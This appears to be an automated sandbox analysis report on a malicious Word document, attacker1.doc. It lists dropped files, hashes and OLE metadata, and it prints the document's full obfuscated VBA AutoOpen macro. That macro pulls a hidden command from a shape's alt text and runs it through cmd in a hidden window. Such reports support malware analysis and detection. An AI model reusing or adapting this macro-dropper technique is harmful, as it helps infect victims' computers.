            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:53 2021, mtime=Mon Aug 30 20:08:53 2021, atime=Sat Nov 13 03:55:10 2021, length=83968, window=hide
            Category:dropped
            Size (bytes):1009
            Entropy (8bit):4.522204860308124
            Encrypted:false
            SSDEEP:12:8JsFRgXg/XAlCPCHaX6zBFB/z+X+WQaiAeStKicvbr80L8GAeiDtZ3YilMMEpxRE:8c/XTKz3cqvzSrev80LhziDv3qVQd7Qy
            MD5:D67F2D007362909E5C9E76278F405DF0
            SHA1:6AF097168EB235BE02DD5EF9284584F68F4154D3
            SHA-256:43A527AE14FA391F5F5FD60FC20BC3B89F3EC0508BA802A87288FEC3043F941B
            SHA-512:9E1B751F5510B71A0E137891A3D37F556BC258CF2ACFE62700E21698257991DCAEFE94934EAB0848AA12AD622AAA227B983766F1FCA1D9EAD79CA6DAD72397E4
            Malicious:false
            Preview: L..................F.... ......<......<....y@.J....H...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S....Desktop.d......QK.X.S..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2..H..mS.& .ATTACK~1.DOC..H.......S...S..*.........................a.t.t.a.c.k.e.r.1...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop\attacker1.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.a.t.t.a.c.k.e.r.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9..g............[D_....3N...W...9..g........
            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):69
            Entropy (8bit):4.484070798959447
            Encrypted:false
            SSDEEP:3:bDuMJlcRiFUmX1cCUv:bCBiFoC2
            MD5:17DE220ED3D745D01A065BA9976BDD3B
            SHA1:2E601379DD5BCFBCA3679BCA4C391870B52D502A
            SHA-256:1086157EF52702C3F737A70C773E9326E3BBF1BC7146A738EB864F5E6D9DA5BF
            SHA-512:FBA3690C7C475953C18DBC2A397849030762C67624B54D73E142B8B18DD77FB4F74DE3FDF41DE2D38F231EF16F1834F21DBF008EFE334A07E8BFC84527CC7E3E
            Malicious:false
            Preview: [folders]..Templates.LNK=0..attacker1.LNK=0..[doc]..attacker1.LNK=0..
            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.5038355507075254
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVySyUAyYHG/mWHbilleeKbylln:vdsCkWtUUAyYWclXAyll
            MD5:2055FB0A31E9559840C6AB84D1A668A0
            SHA1:C8A61DFF9D6A04E6D2B20499F735331109AC0574
            SHA-256:8805175F707B3D45FB66A9C44FB935C615193283D8A79D29DEA91A91C9A897D2
            SHA-512:CC2424DC238463163C451DA73D04C9DF8E185A8A853E9B52CFB5E615C65EBAB992A58F5FEF80509ACD0A85D40FE9918F74A43C31DD7D0836B56BC93BD7265AE8
            Malicious:false
            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):8016
            Entropy (8bit):3.5814416306637633
            Encrypted:false
            SSDEEP:96:chQCsMqoqvsqvJCwoHz8hQCsMqoqvsEHyqvJCwor1zeoYVHQF2DNlUVxA2:cyZoHz8yRHnor1zeaF2DIA2
            MD5:10E0FE0DB4EE96DC449E5E36060B824B
            SHA1:CC04006D6BE1A0C76649F787A1608A7818F3B1FF
            SHA-256:7652157FEC78290CE35D5FF3935721739D7AE2FFE6AD407C69282D79CD18B448
            SHA-512:D6F623FCAE3BBEFCF13861B291E11DB776C26C4682E64886640352316F57CEF210F1CE50E6D8981EE47EBF2A4E9DEEC8DD12096FCB234E4A4352796AA59D8910
            Malicious:false
            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BCD8CNWOD0D3BPNFLWKK.temp
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):8016
            Entropy (8bit):3.5814416306637633
            Encrypted:false
            SSDEEP:96:chQCsMqoqvsqvJCwoHz8hQCsMqoqvsEHyqvJCwor1zeoYVHQF2DNlUVxA2:cyZoHz8yRHnor1zeaF2DIA2
            MD5:10E0FE0DB4EE96DC449E5E36060B824B
            SHA1:CC04006D6BE1A0C76649F787A1608A7818F3B1FF
            SHA-256:7652157FEC78290CE35D5FF3935721739D7AE2FFE6AD407C69282D79CD18B448
            SHA-512:D6F623FCAE3BBEFCF13861B291E11DB776C26C4682E64886640352316F57CEF210F1CE50E6D8981EE47EBF2A4E9DEEC8DD12096FCB234E4A4352796AA59D8910
            Malicious:false
            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
            C:\Users\user\Desktop\~$tacker1.doc
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.5038355507075254
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVySyUAyYHG/mWHbilleeKbylln:vdsCkWtUUAyYWclXAyll
            MD5:2055FB0A31E9559840C6AB84D1A668A0
            SHA1:C8A61DFF9D6A04E6D2B20499F735331109AC0574
            SHA-256:8805175F707B3D45FB66A9C44FB935C615193283D8A79D29DEA91A91C9A897D2
            SHA-512:CC2424DC238463163C451DA73D04C9DF8E185A8A853E9B52CFB5E615C65EBAB992A58F5FEF80509ACD0A85D40FE9918F74A43C31DD7D0836B56BC93BD7265AE8
            Malicious:false
            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

            Static File Info

            General

            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Networked multi-state projection, Subject: West Virginia Samanta, Author: 213-446-1757 x7135, Comments: Re-contextualized radical service-desk, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Thu Feb 7 23:45:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0
            Entropy (8bit):6.056002245997666
            TrID:
            • Microsoft Word document (32009/1) 54.23%
            • Microsoft Word document (old ver.) (19008/1) 32.20%
            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
            File name:attacker1.doc
            File size:82944
            MD5:4443840f2870c2cd55062bdcab07e5fd
            SHA1:61911e604362338b0f9c91c4aa69696a88dad62f
            SHA256:2979b5fbb454e2f13d89e58177f8c1f881bd3f0a0bebb1d27da9e189ba9d284e
            SHA512:0ce9ab3c81602bdc59baba724d14703e7fa834125e536e5c88b0cc11fd614fa481d8fb4b391138d436ee950bf0dd0e46124d58f1bec834ddd88925812f4c2e68
            SSDEEP:768:vLaJfu4aLDbyWwFlPpKAEJgkYN3yp7TFphXxNRhFShIxSXhJIGhFvhV9JoTBfDTc:vZPbydDpOKyps4BfDT30jvxz
            File Content Preview:........................>.......................w...........z...............v..................................................................................................................................................................................

            File Icon

            Icon Hash:e4eea2aaa4b4b4a4

            Static OLE Info

            General

            Document Type:OLE
            Number of OLE Files:1

            OLE File "attacker1.doc"

            Indicators

            Has Summary Info:True
            Application Name:Microsoft Office Word
            Encrypted Document:False
            Contains Word Document Stream:True
            Contains Workbook/Book Stream:False
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:
            Flash Objects Count:
            Contains VBA Macros:True

            Summary

            Code Page:1251
            Title:Networked multi-state projection
            Subject:West Virginia Samanta
            Author:213-446-1757 x7135
            Keywords:
            Comments:Re-contextualized radical service-desk
            Template:Normal
            Last Saved By:Windows
            Revion Number:11
            Total Edit Time:180
            Create Time:2018-04-19 18:59:00
            Last Saved Time:2019-02-07 23:45:00
            Number of Pages:1
            Number of Words:1
            Number of Characters:7
            Creating Application:Microsoft Office Word
            Security:0

            Document Summary

            Document Code Page:1251
            Number of Bytes:23552
            Number of Lines:1
            Number of Paragraphs:1
            Thumbnail Scaling Desired:False
            Manager:Mr. Granville McGlynn
            Company:Grady-Adams Rusty McGlynn
            Contains Dirty Links:False
            Shared Document:False
            Changed Hyperlinks:False
            Application Version:1048576

            Streams with VBA

            VBA File Name: ThisDocument.cls, Stream Size: 9852
            General
            Stream Path:Macros/VBA/ThisDocument
            VBA File Name:ThisDocument.cls
            Stream Size:9852
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:01 16 03 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 0b 03 00 00 e7 16 00 00 00 00 00 00 01 00 00 00 06 53 da b7 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            VBA Code
            Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)
lQbWzTrJtfhGiaS = pWNDRZbLZdGgl + CBool(5015) + Len(ChrW(1 + 1) + ChrW(2)) + LenB(Trim("XkBMzwHsSZswNPQMBDL")) + Len(SxZnBTiJkRBD)

tcZwqHFss = zTQlVkgJtJHVH + CBool(6903) + Len(ChrW(6 + 4) + ChrW(10)) + LenB(Trim("jDxtDndtrsCpNSNkxdJzhj")) + Len(RRdTnGKKsvm)

qDRjdabdvLvw = bDhgcvpVdcXNV + CBool(6163) + Len(ChrW(2 + 7) + ChrW(10)) + LenB(Trim("TisXGlccaikddjLpXZhn")) + Len(hVXaKsWdqGRalHZ)

TJgSBgQcFDq = xHtTibzqdL + CBool(6499) + Len(ChrW(2 + 7) + ChrW(1)) + LenB(Trim("iFvxjMCgcVJTWgGHG")) + Len(aQkXvbNzGWvh)
GWGjfdpJrxkg = PfFKPmwSmLwNT + CBool(2009) + Len(ChrW(4 + 7) + ChrW(6)) + LenB(Trim("kdHfDqVfHbpXcWBalpBj")) + Len(jwrLSVvTGmNgSNh)
   CCvSPPJWbrLcHS = ""

fhjjZvgrrjq = mFGCJxVWBXjkl + CBool(1344) + Len(ChrW(8 + 10) + ChrW(3)) + LenB(Trim("bTZapLhFkwRKZPK")) + Len(SWsFlrFhBaHlgGg)
   rjvFRbqzLtkzn = "" + ""

GnxslaCGaT = qqmRcwgpqlk + CBool(6041) + Len(ChrW(1 + 2) + ChrW(7)) + LenB(Trim("FvacXVVTqjKJxgdZjv")) + Len(QdRJwGnCHinZ)
xDgzRpPhghWrJL = NfHHmGCha + CBool(347) + Len(ChrW(3 + 10) + ChrW(10)) + LenB(Trim("QRgSjBfjthjpDkPxVpmDlb")) + Len(jWwMxvjadBtl)


tTRXtXmcgPrktFh = jdmzHVMkcVXcdMP + CBool(5783) + Len(ChrW(2 + 10) + ChrW(10)) + LenB(Trim("rnkhGPWpTBpGNcVlk")) + Len(irVHvSQQvHtd)


GhFdPWgpiqRj = CNLqTtpWDztqK + CBool(8793) + Len(ChrW(1 + 8) + ChrW(9)) + LenB(Trim("SXNhbQpQzmwVQlTmR")) + Len(RJaDmljLvpgjz)



LbZlvNQVaFtMi = vxPLFqFShhCqh + CBool(6141) + Len(ChrW(6 + 10) + ChrW(3)) + LenB(Trim("HahDZGNRJvHTcDKWPnnl")) + Len(zzfDDCMbPXrM)

   SKKdjMpgJRQRK = "" + "" + Trim("")

ppBLnCMSjnSV = fPSQKCwZHRJ + CBool(6767) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("cwZGhscSkqdkCDrjXnTS")) + Len(dmfMtsadBraSX)


pzSpxTNqbhCwW = DVsGkQJsLPQCcZqt + CBool(1865) + Len(ChrW(2 + 8) + ChrW(6)) + LenB(Trim("kZNsfRinpsRKqfNnF")) + Len(laLlSgkFRvtad)
JtnpWHTxSiiz = aCwfgTJDmbRQW + CBool(6925) + Len(ChrW(9 + 10) + ChrW(2)) + LenB(Trim("dDWBignPNFqBkrjqZlKiT")) + Len(chdsMqJKtKM)

QmrcNWGaSgCWz = lFQtNLhczCraQG + CBool(3980) + Len(ChrW(3 + 8) + ChrW(6)) + LenB(Trim("VKvjZliFSGsfCGKhSf")) + Len(KPgHQGtPqLTjphCn)
   hdNxDVBxCTqQTpB = LTrim("")
nFtNXRVXbdFr = VPWjviWKBpJi + CBool(7052) + Len(ChrW(4 + 5) + ChrW(8)) + LenB(Trim("VBjjdfMslCcHNgbjJa")) + Len(nBDKwlZJvRMwRR)

gLkHkMNJpWGPiM = qcmPmHlmdWZqj + CBool(194) + Len(ChrW(7 + 5) + ChrW(1)) + LenB(Trim("ZTTXLrVxkWNKjjPrfCj")) + Len(crtmLCNraQLF)
zMzTwHmjJjndL = rDZKxGvDrNBJ + CBool(3433) + Len(ChrW(7 + 9) + ChrW(1)) + LenB(Trim("XaMLmrHxaSlqSXV")) + Len(ptlCjjDiKZ)

MNKsCVNXktg = hdJScJQgXmkm + CBool(2807) + Len(ChrW(7 + 5) + ChrW(9)) + LenB(Trim("RbRanmjXmLslKkZDlB")) + Len(WfkDLfGhqhWfhTN)
nHMgbFSzmgv = TBWHlimLMV + CBool(7832) + Len(ChrW(9 + 8) + ChrW(10)) + LenB(Trim("LsHkNQtMsMzltJgPQgfkR")) + Len(JHxRSZaqkRwtHi)
   RJzJQGRzrc = ""


MCFxxPbQXmfGfnL = NsLSSSLGDfkwlt + CBool(5937) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("SNpRVqvVcnPhX")) + Len(gJMqliiHCRNZQTc)
LdnJwgZjbnKqtaa = aBBZDWsTDPPnS + CBool(8258) + Len(ChrW(7 + 3) + ChrW(4)) + LenB(Trim("faLQCswVKLgWjmJKg")) + Len(KmpHBhFRwlKKMm)

FHvwQsqqdgbr = wtDvZMrVDatsPG + CBool(8557) + Len(ChrW(6 + 1) + ChrW(4)) + LenB(Trim("lDjJcSLdkCqGrRzwdlKHLVHn")) + Len(qlkRQRpBTtrm)
CiRSdXZHwV = NKxZvdzbPWxxN + CBool(1618) + Len(ChrW(10 + 4) + ChrW(4)) + LenB(Trim("pJRTVfBcDhxrcwKkPDbFt")) + Len(wKPlSJwvvXqW)


xVpspwsllZGqG = MpTBwVxXgdanm + CBool(5472) + Len(ChrW(1 + 3) + ChrW(5)) + LenB(Trim("KlilNHcTHfLXgQgkkRH")) + Len(tlWSglqmcgHrcq)

   CWflqnrJbKVBj = RTrim("") + ""
kkCTbdBcJnsGw = sFdLzbirFimt + CBool(6092) + Len(ChrW(6 + 7) + ChrW(8)) + LenB(Trim("cvXVCvgQfdqkdZkQwadmPMg")) + Len(acSnFqKQZJkgq)

cGvRqkvVFLFzsK = mChrRcSmQTlzbtd + CBool(476) + Len(ChrW(5 + 5) + ChrW(9)) + LenB(Trim("iXZiMssZcgzrHZrcFvVtk")) + Len(iixsSRWTqT)


   
QwXhZsRSjsaLm = FracTilLgHn + CBool(590) + Len(ChrW(4 + 8) + ChrW(7)) + LenB(Trim("MNhhbMhpCpvcwlCCWRgfhFc")) + Len(igrKGJjKXXfr)

   Set pNHbvwXpnbZvS = Shapes(Trim("h9mkae7"))
dWDHaNGFDcG = iGKRcdzDwMZzqlWN + CBool(2417) + Len(ChrW(5 + 3) + ChrW(4)) + LenB(Trim("hDNlqMjmcDXrwkrDwq")) + Len(mQhXDqaHVLMab)
zVRvpZVSlZP = jxrRCZTpPSjqG + CBool(747) + Len(ChrW(9 + 2) + ChrW(3)) + LenB(Trim("wnkLGNvnwtBPGKxVMs")) + Len(HmbfaFbBPKWJstpW)

   VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
lFbSwGcXvLj = ZcCmWkkqqB + CBool(3868) + Len(ChrW(10 + 10) + ChrW(7)) + LenB(Trim("GpsfXGHdXPiPBQWm")) + Len(CxtsBzHdKBGmb)
gQVFVamfZLZ = GgRgBdCqvLXk + CBool(260) + Len(ChrW(4 + 5) + ChrW(3)) + LenB(Trim("pSdvPiVsNHZWVbr")) + Len(ZxkaZVpVviNG)
   

XXDBdSGLmXrT = kkfQTPTJpjjs + CBool(9051) + Len(ChrW(4 + 6) + ChrW(1)) + LenB(Trim("RkTPBgXDhBTgMXtKSb")) + Len(bvfFxpHJWlX)

rhfWlBhJNxhXd = DbfBblNVjZrSd + CBool(7064) + Len(ChrW(10 + 10) + ChrW(6)) + LenB(Trim("MwstcPJvhangVNZapdZ")) + Len(jfPdPngPqkfl)
PrBtRSHfsVF = PDvGhnzPcxhD + CBool(1483) + Len(ChrW(5 + 8) + ChrW(1)) + LenB(Trim("tvjtZQfzHdgNNRHZqilSN")) + Len(JJLiShTtqxhXr)




fXsWigQMrcFc = mxpJbmSSQ + CBool(5222) + Len(ChrW(10 + 8) + ChrW(10)) + LenB(Trim("rdlmccJkfVhXRccQBM")) + Len(RkVtwCRbFKwknG)
dgDaZRkBlQp = MvZcVWwwaGt + CBool(5297) + Len(ChrW(4 + 6) + ChrW(5)) + LenB(Trim("VgBdpkxSLXdGbgLKh")) + Len(qNJnfcLpkQXcp)

wdTqKxXzraCs = mkaDKJfCfVRm + CBool(8379) + Len(ChrW(1 + 10) + ChrW(5)) + LenB(Trim("klTWfaFrtslwGtgadMj")) + Len(GvivfXcsHC)




End Sub

            Streams

            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
            General
            Stream Path:\x1CompObj
            File Type:data
            Stream Size:114
            Entropy:4.2359563651
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
            General
            Stream Path:\x5DocumentSummaryInformation
            File Type:data
            Stream Size:4096
            Entropy:0.443882389207
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . X . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M r . G r a n v i l l e M c G l y n n . . . . . . . . . . . G r a d y - A d a m s R u s t y M c G l y n n . . . . . . . . \\ . . . . . .
            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 58 01 00 00 0e 00 00 00 01 00 00 00 78 00 00 00 0e 00 00 00 80 00 00 00 0f 00 00 00 a0 00 00 00 04 00 00 00 c4 00 00 00 05 00 00 00 cc 00 00 00 06 00 00 00 d4 00 00 00 11 00 00 00 dc 00 00 00 17 00 00 00 e4 00 00 00 0b 00 00 00 ec 00 00 00
            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
            General
            Stream Path:\x5SummaryInformation
            File Type:data
            Stream Size:4096
            Entropy:0.770456390779
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . L . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . N e t w o r k e d m u l t i - s t a t e p r o j e c t i o n . . . . . . . . . . . . W e s t
            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 dc 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 c4 00 00 00 04 00 00 00 e4 00 00 00 05 00 00 00 00 01 00 00 06 00 00 00 0c 01 00 00 07 00 00 00 3c 01 00 00 08 00 00 00 4c 01 00 00 09 00 00 00 6c 01 00 00
            Stream Path: 1Table, File Type: data, Stream Size: 13859
            General
            Stream Path:1Table
            File Type:data
            Stream Size:13859
            Entropy:4.98438163064
            Base64 Encoded:True
            Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
            Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
            Stream Path: Data, File Type: data, Stream Size: 33430
            General
            Stream Path:Data
            File Type:data
            Stream Size:33430
            Entropy:7.67657311196
            Base64 Encoded:True
            Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . . $ m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . b . . . . A . . . . . . J . . . . . . . . . . . . . . . 9 . 9 . 6 . e . 2 . e . c . d . - . 4 . 5 . c . f . - . 4 . b . c . d . - . 8 . d . a . 8 . - . 1 . 9 . 9 . f . b . 2 . a . b . 9 . 7 . 3 . f . . . . . . . . . . . . . . . R . . . . . . . . . . N . . . . . W " . . . Z . . . . . . . . . . . . . D . . . . . . . . F
            Data Raw:96 82 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 09 24 6d 0b e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 86 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 62 00 00 00 04 41 01 00 00 00 05 c1 4a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 39 00 39 00
            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 365
            General
            Stream Path:Macros/PROJECT
            File Type:ASCII text, with CRLF line terminators
            Stream Size:365
            Entropy:5.31281711862
            Base64 Encoded:True
            Data ASCII:I D = " { 1 D A 1 2 6 7 B - F E 9 0 - 4 9 5 0 - 8 5 7 4 - 9 8 C 8 C 4 9 9 C 0 8 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 B 7 9 B 2 3 4 2 C 3 8 2 C 3 8 2 C 3 8 2 C 3 8 " . . D P B = " F 1 F 3 3 8 B D 3 9 B D 3 9 B D " . . G C = " 6 7 6 5 A E 5 8 5 2 B 8 C 9 B 9 C 9 B 9 3 6 " . . . . [ H o s t E x t e n d e r I n f o ] . .
            Data Raw:49 44 3d 22 7b 31 44 41 31 32 36 37 42 2d 46 45 39 30 2d 34 39 35 30 2d 38 35 37 34 2d 39 38 43 38 43 34 39 39 43 30 38 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
            General
            Stream Path:Macros/PROJECTwm
            File Type:data
            Stream Size:41
            Entropy:3.07738448508
            Base64 Encoded:False
            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
